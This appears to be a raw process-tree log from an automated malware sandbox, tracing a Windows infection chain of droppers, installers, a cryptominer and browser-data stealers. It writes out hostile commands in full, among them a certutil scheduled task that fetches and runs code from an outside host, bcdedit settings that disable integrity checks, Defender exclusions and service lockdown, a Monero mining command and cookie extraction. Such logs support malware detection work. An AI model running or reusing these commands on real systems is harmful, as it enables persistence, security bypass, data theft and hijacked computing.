C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"11⤵PID:7768
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵
- Drops file in Windows directory
PID:5060 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes12⤵
- Modifies data under HKEY_USERS
PID:5784 -
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe /8-2311⤵
- Drops file in Drivers directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:6264 -
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F12⤵
- Creates scheduled task(s)
PID:7032 -
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F12⤵
- Creates scheduled task(s)
PID:5484 -
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"12⤵
- Loads dropped DLL
PID:6076 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER13⤵
- Modifies boot configuration data using bcdedit
PID:8008 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:13⤵
- Modifies boot configuration data using bcdedit
PID:1460 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:13⤵
- Modifies boot configuration data using bcdedit
PID:4108 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows13⤵
- Modifies boot configuration data using bcdedit
PID:7384 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe13⤵
- Modifies boot configuration data using bcdedit
PID:4580 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe13⤵
- Modifies boot configuration data using bcdedit
PID:8184 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV114⤵
- Adds Run key to start application
PID:5280 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 013⤵
- Modifies boot configuration data using bcdedit
PID:6096 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn13⤵
- Modifies boot configuration data using bcdedit
PID:5708 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 113⤵
- Modifies boot configuration data using bcdedit
PID:4020 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}13⤵
- Modifies boot configuration data using bcdedit
PID:7364 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast13⤵
- Modifies boot configuration data using bcdedit
PID:1124 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -timeout 013⤵
- Modifies boot configuration data using bcdedit
PID:4836 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}13⤵
- Modifies boot configuration data using bcdedit
PID:1752 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set bootmenupolicy legacy13⤵
- Modifies boot configuration data using bcdedit
PID:6840 -
C:\Windows\System32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v12⤵
- Modifies boot configuration data using bcdedit
PID:6132 -
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exeC:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe12⤵PID:4724
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"12⤵PID:6688
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)13⤵PID:7280
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)14⤵PID:8128
-
C:\Users\Admin\AppData\Local\Temp\csrss\ww31.exeC:\Users\Admin\AppData\Local\Temp\csrss\ww31.exe12⤵PID:6784
-
C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exeC:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe12⤵PID:420
-
C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exeC:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe12⤵PID:1792
-
C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exeC:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe12⤵PID:6872
-
C:\Users\Admin\AppData\Local\Temp\csrss\mg20201223-1.exeC:\Users\Admin\AppData\Local\Temp\csrss\mg20201223-1.exe12⤵PID:7796
-
C:\Users\Admin\AppData\Local\Temp\csrss\ml20201223.exeC:\Users\Admin\AppData\Local\Temp\csrss\ml20201223.exe12⤵PID:2928
-
C:\Users\Admin\AppData\Local\Temp\csrss\m672.exeC:\Users\Admin\AppData\Local\Temp\csrss\m672.exe12⤵PID:7408
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2052 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
- Suspicious use of WriteProcessMemory
PID:2652 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Executes dropped EXE
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:584 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2164 -
C:\Users\Admin\AppData\Roaming\CDB6.tmp.exe"C:\Users\Admin\AppData\Roaming\CDB6.tmp.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1636 -
C:\Users\Admin\AppData\Roaming\CDB6.tmp.exe"C:\Users\Admin\AppData\Roaming\CDB6.tmp.exe"6⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:3916 -
C:\Users\Admin\AppData\Roaming\CF6C.tmp.exe"C:\Users\Admin\AppData\Roaming\CF6C.tmp.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1540 -
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\CF6C.tmp.exe"6⤵PID:5756
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK7⤵
- Delays execution with timeout.exe
PID:5872 -
C:\Users\Admin\AppData\Local\Temp\8590c1ec..exe"C:\Users\Admin\AppData\Local\Temp\8590c1ec..exe"5⤵PID:888
-
C:\Users\Admin\AppData\Local\Temp\8590c1ec..exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 506⤵
- Executes dropped EXE
PID:5096 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"5⤵PID:1736
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:240 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:4720 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"4⤵PID:4516
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:5800
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:7728
-
C:\Users\Admin\AppData\Local\Temp\is-2OS74.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-2OS74.tmp\vpn.tmp" /SL5="$201E8,15170975,270336,C:\Users\Admin\AppData\Local\Temp\q1l1hs0cwu0\vpn.exe" /silent /subid=4821⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies registry class
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4576 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "2⤵PID:4880
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap09013⤵PID:5380
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "2⤵PID:200
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap09013⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
PID:5632 -
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:4804 -
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:5900
-
C:\Users\Admin\AppData\Local\Temp\is-2JHG0.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-2JHG0.tmp\Setup3310.tmp" /SL5="$301FE,138429,56832,C:\Users\Admin\AppData\Local\Temp\r4ww53u0lsj\Setup3310.exe" /Verysilent /subid=5771⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4524 -
C:\Users\Admin\AppData\Local\Temp\is-7EO9F.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-7EO9F.tmp\Setup.exe" /Verysilent2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4140 -
C:\Users\Admin\AppData\Local\Temp\is-QN58N.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-QN58N.tmp\Setup.tmp" /SL5="$50236,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-7EO9F.tmp\Setup.exe" /Verysilent3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:4844 -
C:\Users\Admin\AppData\Local\Temp\is-HLI6I.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-HLI6I.tmp\Delta.exe" /Verysilent4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5392 -
C:\Users\Admin\AppData\Local\Temp\is-I97AB.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-I97AB.tmp\Delta.tmp" /SL5="$10412,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-HLI6I.tmp\Delta.exe" /Verysilent5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:5508 -
C:\Users\Admin\AppData\Local\Temp\is-IJ8QI.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-IJ8QI.tmp\Setup.exe" /VERYSILENT6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:836 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-IJ8QI.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit7⤵PID:6140
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f8⤵
- Kills process with taskkill
PID:4556 -
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Delays execution with timeout.exe
PID:6012 -
C:\Users\Admin\AppData\Local\Temp\is-HLI6I.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-HLI6I.tmp\PictureLAb.exe" /Verysilent4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4536 -
C:\Users\Admin\AppData\Local\Temp\is-CJ4PR.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-CJ4PR.tmp\PictureLAb.tmp" /SL5="$20366,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-HLI6I.tmp\PictureLAb.exe" /Verysilent5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:4388 -
C:\Users\Admin\AppData\Local\Temp\is-INPRF.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-INPRF.tmp\Setup.exe" /VERYSILENT6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6080 -
C:\Users\Admin\AppData\Local\Temp\is-SBG6H.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-SBG6H.tmp\Setup.tmp" /SL5="$3038C,298214,214528,C:\Users\Admin\AppData\Local\Temp\is-INPRF.tmp\Setup.exe" /VERYSILENT7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:4920 -
C:\Users\Admin\AppData\Local\Temp\is-7ESPB.tmp\HGT.exe"C:\Users\Admin\AppData\Local\Temp\is-7ESPB.tmp\HGT.exe" /S /UID=lab2148⤵PID:6012
-
C:\Program Files\Common Files\WVWSNLBSQQ\prolab.exe"C:\Program Files\Common Files\WVWSNLBSQQ\prolab.exe" /VERYSILENT9⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5196 -
C:\Users\Admin\AppData\Local\Temp\is-S887L.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-S887L.tmp\prolab.tmp" /SL5="$40420,575243,216576,C:\Program Files\Common Files\WVWSNLBSQQ\prolab.exe" /VERYSILENT10⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:4888 -
C:\Users\Admin\AppData\Local\Temp\ad-310d0-3db-0c2a1-30471ccd69fb0\Popelalowi.exe"C:\Users\Admin\AppData\Local\Temp\ad-310d0-3db-0c2a1-30471ccd69fb0\Popelalowi.exe"9⤵
- Executes dropped EXE
PID:5548 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fu1rix12.1oo\gaooo.exe & exit10⤵PID:6628
-
C:\Users\Admin\AppData\Local\Temp\fu1rix12.1oo\gaooo.exeC:\Users\Admin\AppData\Local\Temp\fu1rix12.1oo\gaooo.exe11⤵
- Suspicious use of SetWindowsHookEx
PID:7616 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
- Suspicious use of SetWindowsHookEx
PID:7844 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
- Suspicious use of SetWindowsHookEx
PID:6304 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5huzhvyw.hu3\md7_7dfj.exe & exit10⤵PID:4472
-
C:\Users\Admin\AppData\Local\Temp\5huzhvyw.hu3\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\5huzhvyw.hu3\md7_7dfj.exe11⤵
- Suspicious use of SetWindowsHookEx
PID:4328 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gjs2vyne.u0i\askinstall29.exe & exit10⤵PID:4468
-
C:\Users\Admin\AppData\Local\Temp\gjs2vyne.u0i\askinstall29.exeC:\Users\Admin\AppData\Local\Temp\gjs2vyne.u0i\askinstall29.exe11⤵
- Suspicious use of SetWindowsHookEx
PID:6212 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe12⤵PID:7752
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe13⤵
- Kills process with taskkill
PID:7988 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iflb3oud.rj5\customer4.exe & exit10⤵PID:8100
-
C:\Users\Admin\AppData\Local\Temp\iflb3oud.rj5\customer4.exeC:\Users\Admin\AppData\Local\Temp\iflb3oud.rj5\customer4.exe11⤵
- Suspicious use of SetWindowsHookEx
PID:4592 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"12⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:6472 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exeparse.exe -f json -b edge13⤵PID:6456
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exeparse.exe -f json -b chrome13⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:1292 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exeparse.exe -f json -b firefox13⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:7612 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\irw4izst.nrr\HookSetp.exe & exit10⤵PID:192
-
C:\Users\Admin\AppData\Local\Temp\irw4izst.nrr\HookSetp.exeC:\Users\Admin\AppData\Local\Temp\irw4izst.nrr\HookSetp.exe11⤵PID:6480
-
C:\ProgramData\2124834.23"C:\ProgramData\2124834.23"12⤵PID:7872
-
C:\ProgramData\2311699.25"C:\ProgramData\2311699.25"12⤵
- Adds Run key to start application
PID:7984 -
C:\ProgramData\Windows Host\Windows Host.exe"C:\ProgramData\Windows Host\Windows Host.exe"13⤵PID:6700
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ulsa111g.0xz\GcleanerWW.exe /mixone & exit10⤵PID:6392
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0s2wxvdi.1ek\privacytools5.exe & exit10⤵PID:6768
-
C:\Users\Admin\AppData\Local\Temp\0s2wxvdi.1ek\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\0s2wxvdi.1ek\privacytools5.exe11⤵
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:7672 -
C:\Users\Admin\AppData\Local\Temp\0s2wxvdi.1ek\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\0s2wxvdi.1ek\privacytools5.exe12⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:7404 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1bealidw.ldp\setup.exe /8-2222 & exit10⤵PID:7288
-
C:\Users\Admin\AppData\Local\Temp\1bealidw.ldp\setup.exeC:\Users\Admin\AppData\Local\Temp\1bealidw.ldp\setup.exe /8-222211⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:5636 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Fragrant-Forest"12⤵PID:5240
-
C:\Program Files (x86)\Fragrant-Forest\7za.exe"C:\Program Files (x86)\Fragrant-Forest\7za.exe" e -p154.61.71.51 winamp-plugins.7z12⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:6016 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Fragrant-Forest\setup.exe" -map "C:\Program Files (x86)\Fragrant-Forest\WinmonProcessMonitor.sys""12⤵PID:5884
-
C:\Program Files (x86)\Fragrant-Forest\setup.exe"C:\Program Files (x86)\Fragrant-Forest\setup.exe" -map "C:\Program Files (x86)\Fragrant-Forest\WinmonProcessMonitor.sys"13⤵
- Drops file in Program Files directory
- Suspicious behavior: LoadsDriver
PID:5916 -
C:\Program Files (x86)\Fragrant-Forest\7za.exe"C:\Program Files (x86)\Fragrant-Forest\7za.exe" e -p154.61.71.51 winamp.7z12⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:7308 -
C:\Program Files (x86)\Fragrant-Forest\setup.exe"C:\Program Files (x86)\Fragrant-Forest\setup.exe" /8-222212⤵PID:5108
-
C:\Program Files (x86)\Fragrant-Forest\setup.exe"C:\Program Files (x86)\Fragrant-Forest\setup.exe" /8-222213⤵
- Modifies data under HKEY_USERS
PID:6292 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zmg1sjbl.idw\MultitimerFour.exe & exit10⤵PID:7600
-
C:\Users\Admin\AppData\Local\Temp\zmg1sjbl.idw\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\zmg1sjbl.idw\MultitimerFour.exe11⤵PID:7840
-
C:\Users\Admin\AppData\Local\Temp\X0L9VLX3PA\setups.exe"C:\Users\Admin\AppData\Local\Temp\X0L9VLX3PA\setups.exe" ll12⤵
- Suspicious use of SetWindowsHookEx
PID:6072 -
C:\Users\Admin\AppData\Local\Temp\is-VOQ79.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-VOQ79.tmp\setups.tmp" /SL5="$502D8,549376,61440,C:\Users\Admin\AppData\Local\Temp\X0L9VLX3PA\setups.exe" ll13⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:7040 -
C:\Users\Admin\AppData\Local\Temp\RBB0U1V76O\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\RBB0U1V76O\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10412⤵PID:5060
-
C:\Users\Admin\AppData\Local\Temp\RBB0U1V76O\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\RBB0U1V76O\multitimer.exe" 1 3.1616095912.6053aaa8c5a39 10413⤵PID:5280
-
C:\Users\Admin\AppData\Local\Temp\RBB0U1V76O\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\RBB0U1V76O\multitimer.exe" 2 3.1616095912.6053aaa8c5a3914⤵
- Checks for any installed AV software in registry
- Maps connected drives based on registry
- Enumerates system info in registry
PID:2228 -
C:\Users\Admin\AppData\Local\Temp\1lsitzqztgj\AwesomePoolU1.exe"C:\Users\Admin\AppData\Local\Temp\1lsitzqztgj\AwesomePoolU1.exe"15⤵PID:8096
-
C:\Users\Admin\AppData\Local\Temp\rowbsuvdsgc\vict.exe"C:\Users\Admin\AppData\Local\Temp\rowbsuvdsgc\vict.exe" /VERYSILENT /id=53515⤵
- Suspicious use of SetWindowsHookEx
PID:6492 -
C:\Users\Admin\AppData\Local\Temp\is-U8CCS.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-U8CCS.tmp\vict.tmp" /SL5="$50292,870426,780800,C:\Users\Admin\AppData\Local\Temp\rowbsuvdsgc\vict.exe" /VERYSILENT /id=53516⤵
- Loads dropped DLL
PID:7136 -
C:\Users\Admin\AppData\Local\Temp\is-GOPAJ.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-GOPAJ.tmp\wimapi.exe" 53517⤵PID:8188
-
C:\Users\Admin\AppData\Local\Temp\fjbgatmvui5\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\fjbgatmvui5\Setup3310.exe" /Verysilent /subid=57715⤵PID:8132
-
C:\Users\Admin\AppData\Local\Temp\is-J5HUV.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-J5HUV.tmp\Setup3310.tmp" /SL5="$3027A,138429,56832,C:\Users\Admin\AppData\Local\Temp\fjbgatmvui5\Setup3310.exe" /Verysilent /subid=57716⤵
- Loads dropped DLL
PID:5704 -
C:\Users\Admin\AppData\Local\Temp\is-IFF6U.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-IFF6U.tmp\Setup.exe" /Verysilent17⤵PID:6788
-
C:\Users\Admin\AppData\Local\Temp\is-D1P7F.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-D1P7F.tmp\Setup.tmp" /SL5="$204B2,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-IFF6U.tmp\Setup.exe" /Verysilent18⤵
- Loads dropped DLL
PID:6844 -
C:\Users\Admin\AppData\Local\Temp\is-HEM8M.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-HEM8M.tmp\Delta.exe" /Verysilent19⤵PID:1060
-
C:\Users\Admin\AppData\Local\Temp\is-JVSL2.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-JVSL2.tmp\Delta.tmp" /SL5="$202CE,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-HEM8M.tmp\Delta.exe" /Verysilent20⤵
- Loads dropped DLL
PID:6848 -
C:\Users\Admin\AppData\Local\Temp\is-S2FN7.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-S2FN7.tmp\Setup.exe" /VERYSILENT21⤵
- Loads dropped DLL
- Checks processor information in registry
PID:8144 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-S2FN7.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit22⤵PID:7960
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f23⤵
- Kills process with taskkill
PID:7304 -
C:\Windows\SysWOW64\timeout.exetimeout /t 623⤵
- Delays execution with timeout.exe
PID:4824 -
C:\Users\Admin\AppData\Local\Temp\is-HEM8M.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-HEM8M.tmp\PictureLAb.exe" /Verysilent19⤵PID:6556
-
C:\Users\Admin\AppData\Local\Temp\is-RTBVR.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-RTBVR.tmp\PictureLAb.tmp" /SL5="$302CE,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-HEM8M.tmp\PictureLAb.exe" /Verysilent20⤵
- Loads dropped DLL
PID:3344 -
C:\Users\Admin\AppData\Local\Temp\is-2LCHJ.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-2LCHJ.tmp\Setup.exe" /VERYSILENT21⤵PID:8140
-
